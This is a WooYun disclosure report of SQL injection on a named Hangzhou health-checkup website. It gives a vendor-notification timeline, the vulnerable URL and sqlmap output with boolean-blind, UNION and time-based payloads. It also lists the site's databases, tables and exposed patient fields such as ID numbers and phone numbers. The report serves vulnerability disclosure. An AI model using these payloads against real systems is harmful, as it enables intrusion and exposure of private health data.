2014-09-16: 细节已通知厂商并且等待厂商处理中 2014-09-21: 厂商已经确认,细节仅向厂商公开 2014-10-01: 细节向核心白帽子及相关领域专家公开 2014-10-11: 细节向普通白帽子公开 2014-10-21: 细节向实习白帽子公开 2014-10-31: 细节向公众公开
可泄露用户年龄、性别、住址、出生日期、电话、邮件、身高、体重等等一系列体检信息
WooYun: 杭州最大体检机构可遍历所有用户体检报告 云健康http://ysjk.jiankang.cn/
体检中心
输入'
输入and 1=1
注入点http://ysjk.jiankang.cn/?act=mec&id=60
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=mec&id=60 AND 7419=7419 Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: act=mec&id=60 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716e736171,0x4b4e7379494577565262,0x7170696f71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=mec&id=60 AND SLEEP(5)---[12:48:32] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11
数据库
available databases [19]:[*] 114_jiankang_cn[*] bak_hzhailiao_com[*] bak_hzhailiao_jiankang_cn[*] bak_icare_jiankang_cn[*] book_jiankang_cn[*] bs_tjxt_scfb[*] cn_jiankang[*] equipments[*] hzhailiao_com[*] hzhailiao_jiankang_cn[*] hzhailiao_jiankang_cn_bak[*] hzlyy_com[*] icare_jiankang_cn[*] information_schema[*] lyy_jiankang_cn[*] mysql[*] report_hzhailiao[*] yls0804[*] ylscn_jiankang
以其中一个数据库为例数据库hzlyy_com的表
Database: hzlyy_com[64 tables]+--------------------------+| ---check_to expert || ---member_info2 || member_info2012-10-12 || tj_tjdjb2012-10-12 || announcement || check_category || check_category_items || check_items || check_reserve_days || check_yuyue || check_yuyue_items || company || company_check_category || company_department || company_personnel || company_personnel_cancel || feedback || goods || goods_cart || goods_order || goods_order_as || header || meal || member || member_email_auth || member_forget || member_info || member_login_change || member_login_log || member_mobile_auth || member_passwd_change || member_to_check || member_to_device || member_to_groups || member_to_tags || message || message_as || message_old || minfo_func || minfo_groups || minfo_groups_func || minfo_priv || minfo_to_groups || mobile_sms || mobile_sms_mass || music || sports || tags || task || tj_gzry || tj_hydwdmb || tj_hydwdmb_20120725 || tj_personnel || tj_personnel_tjbh || tj_sequences || tj_tjdjb || tj_tjjlb || tj_tjjlmxb || tj_tjxmb || tj_zhxm_hd || vip_card || vip_card_consumption || weight_foods || weight_sports_days |+--------------------------+
泄露这些信息
address, allowance, belong_uid, birthday, category, city, company, company_department_name, company_id, email, email_flag, expert_id, expert_name, face, hastype, height, id, id_number, intro, marry, message_new, mobile, mobile_flag, mobile_remind, money, name, post, province, remark, runstridelength, sex, stridelength, type, uid, weight, xdview_flag
这只是举一例
危害等级:高
漏洞Rank:11
确认时间:2014-09-21 10:02
暂无
洞主能查三围么?
@疯狗 应该会有的吧 上面的拼音我读不全啊
@浮萍 我上次卖了一个肾,不知道能不能查到
@Mosuan 我们是正规组织